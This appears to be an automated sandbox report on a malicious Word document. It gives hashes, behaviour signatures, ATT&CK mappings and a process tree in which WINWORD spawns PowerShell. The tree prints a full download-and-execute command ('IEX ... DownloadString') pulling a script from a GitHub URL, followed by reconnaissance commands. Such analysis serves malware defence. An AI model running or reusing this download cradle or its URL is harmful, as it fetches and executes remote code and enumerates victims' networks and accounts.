Overview

overview

10

Static

static

8

1aca62502e...6a.doc

windows7_x64

10

1aca62502e...6a.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    128s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 22:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a.doc

  • Size

    40KB

  • MD5

    9b7212f54d8460d8144f65d1f644bb13

  • SHA1

    3c2eaba89eab872ee549f22f08fdb83e0a34ad99

  • SHA256

    1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a

  • SHA512

    a5db7be20fdde31a2f329ce27c60036516cf7e13418bb30a4c66a872d12061b74438dbad25ce461e0424a0eb412035e8001a61624f40d46c29ac69ec4cd2d595

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/scriptsample/mal/master/cs-test.ps1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1aca62502efabd340036a0f74f46e03dab633a0d12497b5456590d329fffba6a.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/scriptsample/mal/master/cs-test.ps1');"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Windows\system32\ipconfig.exe
        "C:\Windows\system32\ipconfig.exe" /all
        3⤵
        • Gathers network information
        PID:2752
      • C:\Windows\system32\ARP.EXE
        "C:\Windows\system32\ARP.EXE" -a
        3⤵
          PID:2440
        • C:\Windows\System32\Wbem\WMIC.exe
          "C:\Windows\System32\Wbem\WMIC.exe" useraccount get /ALL
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2392

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Command-Line Interface

    1
    T1059

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    3
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Web Service

    1
    T1102

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2056-137-0x0000000000000000-mapping.dmp
      Download
    • memory/2056-139-0x00007FFDC06F0000-0x00007FFDC11B1000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2056-138-0x00000241E8DF0000-0x00000241E8E12000-memory.dmp
      Filesize

      136KB

      Download
    • memory/2392-142-0x0000000000000000-mapping.dmp
      Download
    • memory/2440-141-0x0000000000000000-mapping.dmp
      Download
    • memory/2752-140-0x0000000000000000-mapping.dmp
      Download
    • memory/2892-133-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2892-134-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2892-132-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2892-131-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2892-136-0x00007FFDA96A0000-0x00007FFDA96B0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2892-135-0x00007FFDA96A0000-0x00007FFDA96B0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2892-130-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2892-144-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2892-145-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2892-146-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2892-147-0x00007FFDABDB0000-0x00007FFDABDC0000-memory.dmp
      Filesize

      64KB

      Download